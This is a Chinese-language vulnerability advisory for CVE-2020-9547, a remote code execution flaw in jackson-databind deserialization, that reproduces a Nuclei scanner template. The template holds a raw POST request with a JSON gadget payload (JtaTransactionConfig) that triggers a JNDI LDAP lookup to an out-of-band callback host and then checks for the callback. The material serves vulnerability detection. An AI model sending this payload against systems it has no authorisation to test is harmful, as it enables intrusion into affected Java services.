FasterXML jackson-databind Deserialization Remote Code Execution Vulnerability

漏洞信息

漏洞名称： FasterXML jackson-databind Deserialization Remote Code Execution Vulnerability

漏洞编号：

• CVE： CVE-2020-9547

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： FasterXML jackson-databind是一个流行的Java库，用于将Java对象序列化为JSON和从JSON反序列化回Java对象。它广泛应用于各种Java应用程序中，特别是在Web服务和RESTful API中，以实现数据的快速转换和处理。由于其广泛的使用，jackson-databind的安全问题可能影响到大量的Java应用程序。

该漏洞属于反序列化类型，具体原因是jackson-databind 2.x在2.9.10.4之前的版本中，未能正确处理序列化小工具与类型化之间的交互，特别是与com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig（即ibatis-sqlmap）相关的部分。当启用了多态类型处理（@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS）时，攻击者可以通过反序列化不受信任的数据来执行任意代码。

此漏洞的影响极为严重，因为它允许攻击者在受影响的系统上通过反序列化恶意的JSON负载来执行任意代码。这意味着攻击者可以完全控制受影响的系统，执行任何操作，包括但不限于数据泄露、服务中断、以及在系统上安装恶意软件。由于攻击不需要任何形式的认证，且可以远程执行，因此该漏洞的风险等级被评定为严重。

产品厂商： FasterXML

产品名称： jackson-databind

影响版本： 2.x before 2.9.10.4

搜索语法： cpe:”cpe:2.3:a:fasterxml:jackson-databind::::::::“

来源： https://github.com/projectdiscovery/nuclei-templates/blob/20d8bacd2a87edd8ab71a30637ebaf6168224f36/http%2Fcves%2F2020%2FCVE-2020-9547.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization Remote Code Execution
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.00943
    epss-percentile: 0.81205
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fasterxml
    product: jackson-databind
    shodan-query: cpe:"cpe:2.3:o:debian:debian_linux"
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,kev

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["java.util.Properties",{"UserTransaction":"{{payload_jndi_ldap}}"}]}]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "contains_any(content_type, 'application/json', 'text/plain')"
          - "status_code == 200 || status_code == 400 || status_code == 500"
        condition: and

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JtaTransactionConfig"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or